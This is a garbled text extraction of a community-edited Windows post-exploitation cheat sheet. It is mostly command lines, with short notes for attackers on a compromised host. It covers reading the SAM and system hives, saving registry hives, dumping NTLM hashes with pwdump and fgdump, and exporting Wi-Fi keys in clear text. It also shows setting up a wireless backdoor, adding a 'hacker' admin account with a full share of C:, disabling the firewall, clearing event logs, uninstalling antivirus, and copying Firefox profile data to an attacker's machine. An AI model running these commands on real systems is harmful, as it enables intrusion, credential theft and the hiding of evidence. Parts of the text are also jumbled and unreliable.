Windows Post-Exploitation Command Execution
If for any reason you cannot access/edit these files in the future, please contact mubix@hak5.org You can download these files in any format using Google Docs File->Download As method If you are viewing this on anything other than Google Docs then you can get access to the latest links to the Linux/Unix/BSD, OS X, Obscure, Metasploit, and Windows here: http://bit.ly/nuc0N0 DISCLAIMER: Anyone can edit these docs, and all that entails and implies
Windows Post Exploitation Command List - Page: 1
Table of Contents
Blind Files Non Interactive Command Execution System Networking (ipconfig, netstat, net) Configs Finding Important Files Files To Pull (if possible) Remote System Access Auto-Start Directories Binary Planting WMI Reg Command exit Deleting Logs Uninstalling Software AntiVirus (Non interactive) # Other (to be sorted) OS SPECIFIC Win2k3 Vista/7 Vista SP1/7/2008/2008 R2 (x86 & x64) Invasive or Altering Commands Support Tools Binaries / Links / Usage Third Party Portable Tools
Windows Post Exploitation Command List - Page: 2
Blind Files
(Things to pull when all you can do is to blindly read) LFI/Directory traversal(s). Files that will have the same name across networks / Windows domains / systems. File %SYSTEMDRIVE%\boot.ini Expected Contents / Description A file that can be counted on to be on virtually every windows host. Helps with confirmation that a read is happening. This is another file to look for if boot.ini isnt there or coming back, which is some times the case. It stores users' passwords in a hashed format (in LM hash and NTLM hash).
%WINDIR%\win.ini %SYSTEMROOT%\repair\SAM %SYSTEMROOT %\System32\config\RegBack\SAM %SYSTEMROOT%\repair\system %SYSTEMROOT %\System32\config\RegBack\syst em >insert new rows above this line<
SEE IMPORTANT FILES SECTION FOR MORE IDEAS
Non Interactive Command Execution
s
System
Command whoami Expected Output or Description Lists your current user. Not present in all versions of Windows;
Windows Post Exploitation Command List - Page: 3
however shall be present in Windows NT 6.0-6.1. whoami /all set Lists current user, sid, groups current user is a member of and their sids as well as current privilege level. Shows all current environmental variables. Specific ones to look for are USERDOMAIN, USERNAME, USERPROFILE, HOMEPATH, LOGONSERVER, COMPUTERNAME, APPDATA, and ALLUSERPROFILE. Must be an administrator to run this, but it lists the current drives on the system. curely registered executables within the system registry on Windows 7.
fsutil fsinfo drives
reg query HKLM /s /d /f "C:\* *.exe" | find /I "C:\" | find /V """"
Networking (ipconfig, netstat, net)
Command ipconfig /all ipconfig /displaydns netstat -nabo netstat -s -p [tcp|udp| icpm|ip] netstat -r netstat -na | findstr :445 netstat -nao | findstr LISTENING netstat -nao | findstr LISTENING netstat -na | findstr LISTENING netsh diag show all
Windows Post Exploitation Command List - Page: 4
Expected Output or Description Displays the full information about your NICs. Displays your local DNS cache.
XP and up for -o flag to get PIDnet acc XP and up for -o flag to get PID
net view net view /domain net view /domain:otherdomain net user %USERNAME % /domain
Queries NBNS/SMB (SAMBA) and tries to find all hosts in your current workgroup.
Pulls information on the current user, if they are a domain user. If you are a local user then you just drop the /domain. Important things to note are login times, last time changed password, logon scripts, and group membership Lists all of the domain users Prints the password policy for the local system. This can be different and superseded by the doaimn policy. Prints the password policy for the domain Prints the members of the Administrators local group as this was supposed to use localgroup & domain, this actually another way of getting *current* domain admins Prints the members of the Domain Admins group Prints the members of the Enterprise Admins group Prints the list of Domain Controllers for the current domain
net user /domain net accounts net accounts /domain net localgroup administrators net localgroup administrators /domain net group Domain Admins /domain net group Enterprise Admins /domain net group Domain Controllers /domain nbtstat -a [ip here] net share net session | find / \\ arp -a route print
Displays your currently shared SMB entries, and what path(s) they point to
Lists all the systems currently in the machines ARP table. Prints the machines routing table. This can be good for finding other networks and static routes that have been put in place
Windows Post Exploitation Command List - Page: 5
browstat (Not working on XP) netsh wlan show profiles netsh wlan export profile folder=. key=clear netsh wlan [start|stop] hostednetwork netsh wlan set hostednetwork ssid=<ssid> key=<passphrase> keyUsage=persistent| temporary netsh wlan set hostednetwork mode=[allow|disallow] wmic ntdomain list shows all saved wireless profiles. You may then export the info for those profiles with the command below exports a user wifi profile with the password in plaintext to an xml file in the current working directory Starts or stops a wireless backdoor on a windows 7 pc
Complete hosted network setup for creating a wireless backdoor on win 7
enables or disables hosted network service
Retrieve information about Domain and Domain Controller
http://www.securityaegis.com/ntsd-backdoor/
Configs
Command gpresult /z Expected Output or Description Extremely verbose output of GPO (Group policy) settings as applied to the current system and user
sc qc
Windows Post Exploitation Command List - Page: 6
sc query sc queryex type %WINDIR %\System32\drivers\etc\hosts j echo %COMSPEC% Print the contents of the Windows hosts file Prints a directory listing of the Program Files directory. Usually going to be cmd.exe in the Windows directory, but its good to know for sure.
c:\windows\system32\gathernetworkinfo.vbs etc.
Included script with Windows7, enumerates registry, firewall config, dns cache,
Finding Important Files
Command tree C:\ /f /a > C:\output_of_tree.txt dir /a dir /b /s [Directory or Filename] dir \ /s /b | find /I searchstring Searches the output of dir from the root of the drive current drive (\) and all sub drectories (/s) using the base format (/b) so that it outputs the full path for each listing, for searchstring anywhere in the file name or path. Counts the lines of whatever you use for command Description / Reason Prints a directory listing in tree format. The /a makes the tree printed with ASCII characters instead of special ones and the /f displays file names as well as folders
command | find /c /v
Files To Pull (if possible)
File location Description / Reason
Windows Post Exploitation Command List - Page: 7
%SYSTEMDRIVE%\pagefile.sys
Large file, but contains spill over from RAM, usually lots of good information can be pulled, but should be a last resort due to size
%WINDIR%\debug\NetSetup.log %WINDIR%\repair\sam %WINDIR%\repair\system %WINDIR%\repair\software %WINDIR%\repair\security %WINDIR%\iis6.log (5, 6 or 7) %WINDIR%\system32\logfiles\httperr\httperr1.log %SystemDrive%\inetpub\logs\LogFiles %WINDIR%\system32\logfiles\w3svc1\exYYMMDD.log (year month day) %WINDIR%\system32\config\AppEvent.Evt %WINDIR%\system32\config\SecEvent.Evt %WINDIR%\system32\config\default.sav %WINDIR%\system32\config\security.sav %WINDIR%\system32\config\software.sav %WINDIR%\system32\config\system.sav %WINDIR%\system32\CCM\logs\*.log %USERPROFILE%\ntuser.dat %USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat %WINDIR%\System32\drivers\etc\hosts unattend.txt, unattend.xml, sysprep.inf Used in the
Windows Post Exploitation Command List - Page: 8
IIS 6 error log IIS 7s logs location
automated deployment of windows images and can contain user accounts. No known default location.
Remote System Access
Command net share \\computername tasklist /V /S computername qwinsta /SERVER:computername qprocess /SERVER:computername * net use \\computername This maps IPC$ which does not show up as a drive but allows you to access the remote system as the current user. This is less helpful as most commands will automatically make this connection if needed Using the IPC$ mount use a user name and password allows you to access commands that do not usually ask for a username and password as a different user in the context of the remote system. This is useful when youve gotten credentials from somewhere and wish to use them but do not have an active token on a machine you have a session on. reg add "HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add Enable remote desktop. Description / Reason
net use \\computername /user:DOMAIN\username password
Enable remote assistance
Windows Post Exploitation Command List - Page: 9
"HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
net time \\computername (Shows the time of target computer) dir \\computername\share_or_admin_share\ (dir list a remote directory) tasklist /V /S computername Lists tasks w/users running those tasks on a remote system. This will remove any IPC$ connection after it is done so if you are using another user, you need to re-initiate the IPC$ mount
Auto-Start Directories
ver (Returns kernel version - like uname on *nix) %SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ %SystemDrive%\Documents And Settings\All Users\Start Menu\Programs\StartUp\ %SystemDrive%\wmiOWS\Start Menu\Programs\StartUp\ %SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\StartUp\ Windows NT 6.1, 6.0 Windows NT 5.2, 5.1, 5,0 Windows 9x Windows NT 4.0, 3.51, 3.50
Binary Planting
Location / File name msiexec.exe Reason / Description Idea taken from here: http://goo.gl/E3LTa basically put evil binary named msiexec.exe in Downloads directory and when a installer calles msiexec without specifying pah,t you get code execution. Taken from stuxnet: http://blogs.iss.net/archive/papers/ibm-xforce-anWindows Post Exploitation Command List - Page: 10
%SystemRoot%\System32\wbem\mof\
inside-look-at-stuxnet.pdf Look for Print spooler vuln
WMI
wmic bios wmic qfe qfe get hotfixid (This gets patches IDs) wmic startupwmic service wmic process get caption,executablepath,commandline wmic process call create process_name (executes a program) wmic process where name=process_name call terminate (terminates program) wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber (hard drive information) wmic useraccount (usernames, sid, and various security related goodies) wmic useraccount get /ALL wmic share get /ALL (you can use ? for gets help ! ) wmic startup list full (this can be a huge list!!!) wmic /node:"hostname" bios get serialnumber (this can be great for finding warranty info about target)
Reg Command exit
reg save HKLM\Security security.hive (Save security hive to a file) reg save HKLM\System system.hive (Save system hive to a file) reg save HKLM\SAM sam.hive (Save sam to a file)= reg add [\\TargetIPaddr\] [RegDomain][ \Key ] reg export [RegDomain]\[Key] [FileName] reg import [FileName ] reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] (you can to add /s for recurse all values )
Deleting Logs
wevtutil el (list logs) wevtutil cl <LogName> (Clear specific lowbadming) del %WINDIR%\*.log /a /s /q /f
Uninstalling Software AntiVirus (Non interactive)
wmic product get name /value (this gets software names) wmic product where name="XXX" call uninstall /nointeractive (this uninstalls software)
Windows Post Exploitation Command List - Page: 11
# Other (to be sorted)
pkgmgr usefull /iu :Package pkgmgr usefull /iu :TelnetServer (Install Telnet Service ...) pkgmgr /iu:TelnetClient (Client ) rundll32.exe user32.dll, LockWorkStation (locks the screen -invasive-) wscript.exe <script js/vbs> cscript.exe <script js/vbs/c#> xcopy /C /S %appdata%\Mozilla\Firefox\Profiles\*.sqlite \\your_box\firefox_funstuff OS SPECIFICwmicWin2k3 winpop stat domainname
Vista/7
winstat features wbadmin get status wbadmin get items gpresult /H gpols.htm bcdedit /export <filename>
Vista SP1/7/2008/2008R2 (x86 & x64)
Enable/Disable Windows features with Deployment Image Servicing and Management (DISM): *Note* Works well after bypassuac + getsystem (requires system privileges) *Note2* For Dism.exe to work on x64 systems, the long commands are necessary To list features which can be enabled/disabled:
%windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /get-features
To enable a feature (TFTP client for example):
%windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /enable-feature /featurename:TFTP
To disable a feature (again TFTP client):
%windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /disable-feature /featurename:TFTP
Invasive or Altering Commands
These commands change things on the target and can lead to getting detected Command net user hacker hacker Description Creats a new local (to the victim) user called hacker with
Windows Post Exploitation Command List - Page: 12
/add net localgroup administrators /add hacker or net localgroup administrators hacker /add net share nothing$=C:\ /grant:hacker,FULL /unlimited
the password of hacker Adds the new user hacker to the local administrators group
Shares the C drive (you can specify any drive) out as a Windows share and grants the user hacker full rights to access, or modify anything on that drive. One thing to note is that in newer (will have to look up exactly when, I believe since XP SP2) windows versions, share permissions and file permissions are separated. Since we added our selves as a local admin this isnt a problem but it is something to keep in mind
net user username /active:yes /domain netsh firewall set opmode disable netsh firewall set opmode enable
Changes an inactive / disabled account to active. This can useful for re-enabling old domain admins to use, but still puts up a red flag if those accounts are being watched. Disables the local windows firewall Enables the local windows firewall. If rules are not in place for your connection, this could cause you to loose it.
Support Tools Binaries / Links / Usage
Command Link to download Description
Third Party Portable Tools
(must be contained in a single executable)
Windows Post Exploitation Command List - Page: 13
REMEMBER: DO NOT RUN BINARIES YOU HAVENT VETTED - BINARIES BELOW ARE NOT BEING VOUCHED FOR IN ANY WAY AS THIS DOCUMENT CAN BE EDITED BY ANYONE Command carrot.exe /im /ie /ff /gc /wlan /vnc /ps /np /mp /dialup /pwdump PwDump7.exe > ntlm.txt Link to download http://h.ackack.net/carrot-exe.html Description -invasive- Recovers a bunch passwordnetsh firewall set opmode disables.
http://www.tarasco.org/security/pwd ump_7/
-invasive- Dumps Windows NTLM hashes. Holds the credentials for all accounts. A collection of small nifty features.
http://www.nirsoft.net/utils/nircmd.ht ml
adfind.exe -b ou=ActiveDirec tory,dc=exampl e,dc=com -f "objectClass=u ser" sn givenName samaccountna me -nodn -adcsv > exported_users .csv Various tools (e.g. \\hackarmoury. com\tools\all_bi
http://www.joeware.net/freetools/
Joeware tools have been used by admins for a while. This command will output the firstname, lastname and username of everyone in the AD domain example.com. Edit as needed.
Some examples of protocols in use: http://hackarmoury.com/tools \\hackarmoury.com\tools ftp://hackarmoury.com
HackArmoury.com is a site run by pentesters for pentesters, hosting a wide range of common tools accessible over many different
Windows Post Exploitation Command List - Page: 14
naries\fgdump. exe)
svn://hackarmoury.com svn://hackarmoury.com http://ipv6.hackarmoury.com (IPv6 ONLY)
protocols (e.g. Samba, HTTP[S], FTP, RSync, SVN, TFTP, IPv6 etc). The idea is you can access a common toolset from anywhere, without even needing to copy over the binaries to the host in the case of SMB. No registration or authentication required.
Windows Post Exploitation Command List - Page: 15